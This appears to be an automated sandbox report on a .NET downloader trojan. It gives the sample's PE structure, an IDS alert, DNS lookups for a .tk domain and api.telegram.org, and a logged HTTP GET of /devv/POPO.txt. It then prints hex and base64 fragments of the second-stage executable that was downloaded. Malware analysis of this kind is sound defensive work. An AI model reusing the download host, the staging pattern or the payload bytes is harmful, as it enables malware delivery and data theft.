                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000xe0540xe200False0.4872614767699115Targa image data - Map 2 x 5 x 28 +72 - 1-bit alpha - right - four way interleave ""5.972358130871814IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc0x120000x2a0c40x2a200False0.13789526149851633data4.499897463746581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x3e0000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountry
                                RT_ICON0x122c40x2270PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                RT_ICON0x145340x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                RT_ICON0x24d5c0x94a8data
                                RT_ICON0x2e2040x5488data
                                RT_ICON0x3368c0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967055
                                RT_ICON0x378b40x25a8data
                                RT_ICON0x39e5c0x10a8data
                                RT_ICON0x3af040x988data
                                RT_ICON0x3b88c0x468GLS_BINARY_LSB_FIRST
                                RT_GROUP_ICON0x3bcf40x84data
                                RT_VERSION0x3bd780x34cdata
                                DLLImport
                                mscoree.dll_CorExeMain
                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                192.168.2.48.8.8.854800532012811 08/08/22-12:54:11.254271UDP2012811ET DNS Query to a .tk domain - Likely Hostile5480053192.168.2.48.8.8.8
                                TimestampSource PortDest PortSource IPDest IP
                                Aug 8, 2022 12:54:11.637722969 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:11.637773991 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:11.637849092 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:11.661735058 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:11.661786079 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.173983097 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.174120903 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:12.192428112 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:12.192476988 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.192905903 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.238226891 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:12.654378891 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:12.695368052 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.823048115 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.823121071 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.823143959 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.823198080 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.823252916 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:12.823270082 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.823319912 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:12.989171982 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.989211082 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.989299059 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:12.989330053 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.989348888 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:12.989365101 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.989388943 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.989438057 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.989455938 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:12.989471912 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.989484072 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:12.989490986 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:12.989526987 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.989547968 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.989590883 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.989605904 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:12.989622116 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:12.989635944 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:12.989643097 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.050839901 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.155409098 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.155452013 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.155513048 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.155555010 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.155560970 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.155569077 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.155600071 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.155663967 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.155673981 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.155730009 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.155775070 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.155786991 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.155812979 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.155838966 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.155889988 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.156044006 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.156056881 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.156084061 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.156097889 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.156138897 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.156224966 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.156236887 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.156289101 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.156316042 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.156414986 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.156426907 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.156490088 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.156630039 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.156714916 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.156723976 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.156761885 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.323765993 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.323961973 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.323988914 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.324008942 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.324029922 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.324059010 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.324232101 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.324314117 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.324431896 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.324506044 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.324636936 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.324759960 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.324918985 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.324992895 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.325156927 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.325227976 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.325340033 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.325417995 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.325556040 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.325635910 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.495937109 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.496117115 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.496140003 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.496176004 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.496222973 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.496239901 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.496346951 CEST44349751162.240.35.239192.168.2.4
                                Aug 8, 2022 12:54:13.496421099 CEST49751443192.168.2.4162.240.35.239
                                Aug 8, 2022 12:54:13.496478081 CEST44349751162.240.35.239192.168.2.4
                                TimestampSource PortDest PortSource IPDest IP
                                Aug 8, 2022 12:54:11.254271030 CEST5480053192.168.2.48.8.8.8
                                Aug 8, 2022 12:54:11.604284048 CEST53548008.8.8.8192.168.2.4
                                Aug 8, 2022 12:56:03.035561085 CEST6149753192.168.2.48.8.8.8
                                Aug 8, 2022 12:56:03.054502964 CEST53614978.8.8.8192.168.2.4
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Aug 8, 2022 12:54:11.254271030 CEST192.168.2.48.8.8.80xbfc9Standard query (0)sebastiank.tkA (IP address)IN (0x0001)
                                Aug 8, 2022 12:56:03.035561085 CEST192.168.2.48.8.8.80x153aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Aug 8, 2022 12:54:11.604284048 CEST8.8.8.8192.168.2.40xbfc9No error (0)sebastiank.tk162.240.35.239A (IP address)IN (0x0001)
                                Aug 8, 2022 12:56:03.054502964 CEST8.8.8.8192.168.2.40x153aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                • sebastiank.tk
                                • api.telegram.org
                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.449751162.240.35.239443C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                                TimestampkBytes transferredDirectionData
                                2022-08-08 10:54:12 UTC0OUTGET /devv/POPO.txt HTTP/1.1
                                Host: sebastiank.tk
                                Connection: Keep-Alive
                                2022-08-08 10:54:12 UTC0INHTTP/1.1 200 OK
                                Date: Mon, 08 Aug 2022 10:54:11 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Last-Modified: Sun, 07 Aug 2022 21:41:15 GMT
                                Accept-Ranges: bytes
                                Content-Length: 295596
                                Content-Type: text/plain
                                2022-08-08 10:54:12 UTC0INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 43 64 38 35 6d 45 41 41 41 41 41 41 41 41 41 41 4f 41 41 41 67 45 4c 41 51 73 41 41 46 67 44 41 41 41 49 41 41 41 41 41 41 41 41 54 6e 63 44 41 41 41 67 41 41 41 41 41 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDACd85mEAAAAAAAAAAOAAAgELAQsAAFgDAAAIAAAAAAAATncDAAAgAAAAAAAAAABAAAAgAAAAAgA
                                2022-08-08 10:54:12 UTC8INData Raw: 77 59 41 41 41 51 6f 45 67 41 41 42 69 59 6f 6b 41 41 41 43 6e 38 47 41 41 41 45 65 7a 73 41 41 41 54 61 62 43 4d 41 41 41 41 41 41 45 43 50 51 46 73 6f 6b 51 41 41 43 72 63 67 57 41 49 41 41 44 45 49 46 6f 41 48 41 41 41 45 4b 77 59 58 67 41 63 41 41 41 51 71 41 41 41 41 47 7a 41 46 41 46 6f 44 41 41 41 64 41 41 41 52 4b 43 34 43 41 41 59 4b 66 67 67 41 41 41 51 6f 4c 67 49 41 42 68 59 6f 4c 67 41 41 43 68 59 37 50 51 4d 41 41 43 68 64 41 41 41 4b 4b 47 4d 43 41 41 59 6f 4a 41 41 41 43 67 74 2b 43 41 41 41 42 41 77 57 44 51 67 53 41 79 69 53 41 41 41 4b 42 6e 34 49 41 41 41 45 4b 43 51 41 41 41 6f 4b 66 70 4d 41 41 41 71 41 43 41 41 41 42 4e 34 4b 43 53 77 47 43 43 69 55 41 41 41 4b 33 48 34 4f 41 41 41 45 46 6a 4d 38 42 79 67 78 41 41 41 4b 4c 42 67 5a
                                Data Ascii: wYAAAQoEgAABiYokAAACn8GAAAEezsAAATabCMAAAAAAECPQFsokQAACrcgWAIAADEIFoAHAAAEKwYXgAcAAAQqAAAAGzAFAFoDAAAdAAARKC4CAAYKfggAAAQoLgIABhYoLgAAChY7PQMAAChdAAAKKGMCAAYoJAAACgt+CAAABAwWDQgSAyiSAAAKBn4IAAAEKCQAAAoKfpMAAAqACAAABN4KCSwGCCiUAAAK3H4OAAAEFjM8BygxAAAKLBgZ
                                2022-08-08 10:54:12 UTC15INData Raw: 44 63 41 41 41 6f 54 4e 79 67 34 41 41 41 4b 33 67 41 52 43 43 67 45 41 51 41 47 62 38 59 41 41 41 72 65 44 79 55 6f 4e 77 41 41 43 68 4d 34 4b 44 67 41 41 41 72 65 41 42 45 49 4b 4f 30 41 41 41 5a 76 78 67 41 41 43 74 34 50 4a 53 67 33 41 41 41 4b 45 7a 6b 6f 4f 41 41 41 43 74 34 41 45 51 67 6f 7a 41 41 41 42 6d 2f 47 41 41 41 4b 33 67 38 6c 4b 44 63 41 41 41 6f 54 4f 69 67 34 41 41 41 4b 33 67 41 52 43 47 2f 4f 41 41 41 4b 46 6a 36 31 41 51 41 41 45 51 68 76 7a 77 41 41 43 68 4e 42 4f 49 73 42 41 41 41 53 51 53 6a 51 41 41 41 4b 45 7a 73 52 4f 32 38 70 41 67 41 47 44 42 45 37 62 79 63 43 41 41 59 54 43 52 45 37 62 79 4d 43 41 41 59 4b 45 54 74 76 4a 51 49 41 42 68 4d 47 45 51 6c 76 79 51 41 41 43 68 66 2b 41 67 68 76 79 51 41 41 43 68 66 2b 41 6d 41 47
                                Data Ascii: DcAAAoTNyg4AAAK3gARCCgEAQAGb8YAAAreDyUoNwAAChM4KDgAAAreABEIKO0AAAZvxgAACt4PJSg3AAAKEzkoOAAACt4AEQgozAAABm/GAAAK3g8lKDcAAAoTOig4AAAK3gARCG/OAAAKFj61AQAAEQhvzwAAChNBOIsBAAASQSjQAAAKEzsRO28pAgAGDBE7bycCAAYTCRE7byMCAAYKETtvJQIABhMGEQlvyQAAChf+AghvyQAAChf+AmAG
                                2022-08-08 10:54:12 UTC23INData Raw: 67 49 65 51 4f 73 41 41 41 42 2b 44 51 41 41 42 43 6a 76 41 67 41 47 4b 45 41 41 41 41 6f 7a 47 58 34 49 41 41 41 45 4b 50 41 43 41 41 59 6f 4a 41 41 41 43 6f 41 49 41 41 41 45 33 66 30 47 41 41 42 2b 43 41 41 41 42 43 67 75 41 67 41 47 46 69 67 75 41 41 41 4b 46 6a 75 6d 41 41 41 41 66 67 67 41 41 41 52 2b 43 41 41 41 42 47 2f 4a 41 41 41 4b 66 69 67 41 41 41 52 76 79 51 41 41 43 74 70 2b 4b 41 41 41 42 47 2f 4a 41 41 41 4b 62 2b 38 41 41 41 70 2b 4b 41 41 41 42 42 59 6f 4c 67 41 41 43 68 59 75 62 33 34 49 41 41 41 45 66 67 67 41 41 41 52 76 79 51 41 41 43 68 33 61 62 77 67 42 41 41 6f 4b 42 69 6a 78 41 67 41 47 46 69 67 75 41 41 41 4b 46 76 34 42 46 76 34 42 66 67 67 41 41 41 52 2b 43 41 41 41 42 47 2f 4a 41 41 41 4b 47 74 70 76 43 41 45 41 43 6e 34 59
                                Data Ascii: gIeQOsAAAB+DQAABCjvAgAGKEAAAAozGX4IAAAEKPACAAYoJAAACoAIAAAE3f0GAAB+CAAABCguAgAGFiguAAAKFjumAAAAfggAAAR+CAAABG/JAAAKfigAAARvyQAACtp+KAAABG/JAAAKb+8AAAp+KAAABBYoLgAAChYub34IAAAEfggAAARvyQAACh3abwgBAAoKBijxAgAGFiguAAAKFv4BFv4BfggAAAR+CAAABG/JAAAKGtpvCAEACn4Y
                                2022-08-08 10:54:13 UTC31INData Raw: 41 6f 6f 56 77 49 41 42 69 67 75 41 67 41 47 62 33 67 41 41 41 6f 54 46 77 6b 67 44 6f 41 41 41 45 44 41 41 41 41 41 48 78 43 4e 4b 77 41 41 41 52 4d 62 45 52 51 52 47 78 38 51 4b 43 41 42 41 41 6f 44 63 79 45 42 41 41 6f 54 47 52 45 5a 45 52 74 76 49 67 45 41 43 68 4d 63 45 52 4d 58 32 68 66 57 6a 53 73 41 41 41 45 54 48 52 45 55 45 52 49 52 45 39 6f 52 48 52 59 52 45 79 67 57 41 51 41 4b 45 52 78 7a 49 51 45 41 43 68 4d 61 45 52 6f 52 48 57 38 69 41 51 41 4b 45 78 34 66 51 49 30 72 41 41 41 42 45 78 67 52 46 42 38 51 45 52 67 57 45 52 69 4f 74 79 67 57 41 51 41 4b 45 52 67 6f 47 41 45 41 43 69 68 58 41 67 41 47 4b 43 34 43 41 41 5a 76 65 41 41 41 43 68 4d 66 45 52 34 6f 47 41 45 41 43 69 68 58 41 67 41 47 4b 43 34 43 41 41 5a 76 65 41 41 41 43 68 4d 67
                                Data Ascii: AooVwIABiguAgAGb3gAAAoTFwkgDoAAAEDAAAAAHxCNKwAAARMbERQRGx8QKCABAAoDcyEBAAoTGREZERtvIgEAChMcERMX2hfWjSsAAAETHREUERIRE9oRHRYREygWAQAKERxzIQEAChMaERoRHW8iAQAKEx4fQI0rAAABExgRFB8QERgWERiOtygWAQAKERgoGAEACihXAgAGKC4CAAZveAAAChMfER4oGAEACihXAgAGKC4CAAZveAAAChMg
                                2022-08-08 10:54:13 UTC39INData Raw: 41 41 4b 62 79 49 42 41 41 6f 54 42 6e 4d 6d 41 51 41 4b 45 77 55 52 42 52 45 47 62 79 63 42 41 41 6f 52 42 52 68 76 4b 51 45 41 43 68 45 46 47 47 38 71 41 51 41 4b 43 41 4e 76 6d 41 41 41 43 68 4d 45 45 51 56 76 59 77 45 41 43 68 4d 48 45 51 63 52 42 42 59 52 42 49 36 33 62 79 77 42 41 41 6f 4c 33 68 6f 52 42 57 39 6b 41 51 41 4b 43 57 39 6c 41 51 41 4b 33 4e 34 4b 43 53 77 47 43 57 39 58 41 41 41 4b 33 41 63 6f 64 67 41 41 43 69 6f 41 41 41 41 42 48 41 41 41 41 67 42 47 41 42 70 67 41 41 34 41 41 41 41 41 41 67 41 4f 41 47 4a 77 41 41 6f 41 41 41 41 41 47 7a 41 45 41 48 6f 41 41 41 42 4e 41 41 41 52 46 41 74 7a 59 51 45 41 43 67 78 7a 59 67 45 41 43 67 30 43 65 30 67 41 41 41 51 54 42 6e 4d 6d 41 51 41 4b 45 77 55 52 42 52 45 47 62 79 63 42 41 41 6f 52
                                Data Ascii: AAKbyIBAAoTBnMmAQAKEwURBREGbycBAAoRBRhvKQEAChEFGG8qAQAKCANvmAAAChMEEQVvYwEAChMHEQcRBBYRBI63bywBAAoL3hoRBW9kAQAKCW9lAQAK3N4KCSwGCW9XAAAK3AcodgAACioAAAABHAAAAgBGABpgAA4AAAAAAgAOAGJwAAoAAAAAGzAEAHoAAABNAAARFAtzYQEACgxzYgEACg0Ce0gAAAQTBnMmAQAKEwURBREGbycBAAoR
                                2022-08-08 10:54:13 UTC47INData Raw: 77 38 54 42 51 41 52 42 52 33 2b 41 53 77 46 46 67 30 65 45 77 55 41 45 51 55 66 44 66 34 42 4c 41 34 4a 45 51 53 4f 74 7a 38 2f 2f 2f 2f 2f 48 77 34 54 42 51 41 52 42 52 38 4c 2f 67 45 73 46 51 59 49 4b 47 73 44 41 41 59 6f 4a 41 41 41 43 6d 2f 4d 41 41 41 4b 48 77 77 54 42 51 41 52 42 52 6a 2b 41 53 77 4a 63 37 77 41 41 41 6f 4b 47 52 4d 46 41 42 45 46 46 76 34 42 4c 41 4d 58 45 77 55 41 45 51 55 66 45 50 34 42 4c 41 49 72 42 54 69 7a 2f 76 2f 2f 42 69 6f 41 45 7a 41 44 41 46 63 42 41 41 42 63 41 41 41 52 48 78 69 4e 4b 77 41 41 41 51 6f 47 46 69 44 68 41 41 41 41 6e 41 59 58 49 50 41 41 41 41 43 63 42 68 67 67 77 77 41 41 41 4a 77 47 47 53 44 53 41 41 41 41 6e 41 59 61 49 4b 55 41 41 41 43 63 42 68 73 67 74 41 41 41 41 4a 77 47 48 43 43 48 41 41 41 41
                                Data Ascii: w8TBQARBR3+ASwFFg0eEwUAEQUfDf4BLA4JEQSOtz8/////Hw4TBQARBR8L/gEsFQYIKGsDAAYoJAAACm/MAAAKHwwTBQARBRj+ASwJc7wAAAoKGRMFABEFFv4BLAMXEwUAEQUfEP4BLAIrBTiz/v//BioAEzADAFcBAABcAAARHxiNKwAAAQoGFiDhAAAAnAYXIPAAAACcBhggwwAAAJwGGSDSAAAAnAYaIKUAAACcBhsgtAAAAJwGHCCHAAAA
                                2022-08-08 10:54:13 UTC54INData Raw: 67 41 47 42 69 69 6f 41 77 41 47 62 79 6f 43 41 41 59 47 43 39 34 56 4a 53 67 33 41 41 41 4b 45 77 6c 7a 49 67 49 41 42 67 73 6f 4f 41 41 41 43 74 34 41 42 79 6f 42 45 41 41 41 41 41 41 47 41 50 50 35 41 42 55 61 41 41 41 42 47 7a 41 44 41 46 77 41 41 41 42 65 41 41 41 52 63 37 6f 41 41 41 6f 4b 42 6e 34 73 41 51 41 45 4b 42 63 43 41 41 59 6f 56 41 4d 41 42 69 67 59 41 67 41 47 62 38 59 41 41 41 72 65 44 69 55 6f 4e 77 41 41 43 67 77 6f 4f 41 41 41 43 74 34 41 42 6e 34 73 41 51 41 45 4b 42 63 43 41 41 59 6f 56 41 4d 41 42 69 67 5a 41 67 41 47 62 38 59 41 41 41 72 65 44 69 55 6f 4e 77 41 41 43 67 30 6f 4f 41 41 41 43 74 34 41 42 69 6f 42 48 41 41 41 41 41 41 47 41 42 77 69 41 41 34 61 41 41 41 42 41 41 41 77 41 42 78 4d 41 41 34 61 41 41 41 42 47 7a 41 44
                                Data Ascii: gAGBiioAwAGbyoCAAYGC94VJSg3AAAKEwlzIgIABgsoOAAACt4AByoBEAAAAAAGAPP5ABUaAAABGzADAFwAAABeAAARc7oAAAoKBn4sAQAEKBcCAAYoVAMABigYAgAGb8YAAAreDiUoNwAACgwoOAAACt4ABn4sAQAEKBcCAAYoVAMABigZAgAGb8YAAAreDiUoNwAACg0oOAAACt4ABioBHAAAAAAGABwiAA4aAAABAAAwABxMAA4aAAABGzAD
                                2022-08-08 10:54:13 UTC62INData Raw: 41 41 4b 4b 4e 6b 44 41 41 59 58 62 7a 30 41 41 41 6f 4d 43 47 2b 78 41 51 41 4b 44 51 6b 54 44 68 59 54 44 54 6a 43 41 41 41 41 45 51 34 52 44 5a 6f 54 42 58 34 38 41 41 41 4b 4b 4e 6f 44 41 41 59 52 42 53 67 6b 41 41 41 4b 46 32 38 39 41 41 41 4b 45 77 59 6f 46 41 45 41 43 68 45 47 4b 4e 73 44 41 41 5a 76 73 67 45 41 43 6e 51 53 41 41 41 62 62 78 63 42 41 41 6f 54 43 78 45 47 4b 4e 77 44 41 41 5a 76 73 67 45 41 43 6e 51 53 41 41 41 62 45 77 63 52 42 69 6a 64 41 77 41 47 62 37 49 42 41 41 70 30 45 67 41 41 47 78 4d 49 45 67 67 52 43 49 36 33 46 39 6f 6f 42 67 41 41 4b 78 45 48 45 51 67 6f 34 41 41 41 42 68 4d 4a 63 79 49 43 41 41 59 54 43 68 45 4b 45 51 55 6f 33 67 41 41 42 6d 38 6f 41 67 41 47 45 51 6f 52 43 32 38 6b 41 67 41 47 45 51 6f 52 43 57 38 6d
                                Data Ascii: AAKKNkDAAYXbz0AAAoMCG+xAQAKDQkTDhYTDTjCAAAAEQ4RDZoTBX48AAAKKNoDAAYRBSgkAAAKF289AAAKEwYoFAEAChEGKNsDAAZvsgEACnQSAAAbbxcBAAoTCxEGKNwDAAZvsgEACnQSAAAbEwcRBijdAwAGb7IBAAp0EgAAGxMIEggRCI63F9ooBgAAKxEHEQgo4AAABhMJcyICAAYTChEKEQUo3gAABm8oAgAGEQoRC28kAgAGEQoRCW8m
                                2022-08-08 10:54:13 UTC70INData Raw: 67 45 57 2f 67 45 52 42 57 38 6c 41 67 41 47 4b 43 34 43 41 41 59 57 4b 43 34 41 41 41 6f 57 2f 67 45 57 2f 67 46 66 4c 41 67 47 45 51 56 76 45 67 45 41 43 68 49 4a 4b 4c 77 42 41 41 6f 36 45 76 37 2f 2f 39 34 63 45 67 6e 2b 46 68 6f 41 41 42 74 76 56 77 41 41 43 74 7a 65 44 43 67 33 41 41 41 4b 4b 44 67 41 41 41 72 65 41 41 59 71 41 45 46 4d 41 41 41 43 41 41 41 41 63 51 41 41 41 49 6b 42 41 41 44 36 41 51 41 41 44 67 41 41 41 41 41 41 41 41 41 43 41 41 41 41 54 77 41 41 41 41 49 43 41 41 42 52 41 67 41 41 44 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 54 77 41 41 41 42 49 43 41 41 42 68 41 67 41 41 44 41 41 41 41 42 6f 41 41 41 45 62 4d 41 77 41 6a 67 45 41 41 48 30 41 41 42 45 43 43 77 49 6f 4b 41 51 41 42 6d 2b 64 41 41 41 4b 4c 52 45 6f 4b 41 51 41
                                Data Ascii: gEW/gERBW8lAgAGKC4CAAYWKC4AAAoW/gEW/gFfLAgGEQVvEgEAChIJKLwBAAo6Ev7//94cEgn+FhoAABtvVwAACtzeDCg3AAAKKDgAAAreAAYqAEFMAAACAAAAcQAAAIkBAAD6AQAADgAAAAAAAAACAAAATwAAAAICAABRAgAADgAAAAAAAAAAAAAATwAAABICAABhAgAADAAAABoAAAEbMAwAjgEAAH0AABECCwIoKAQABm+dAAAKLREoKAQA
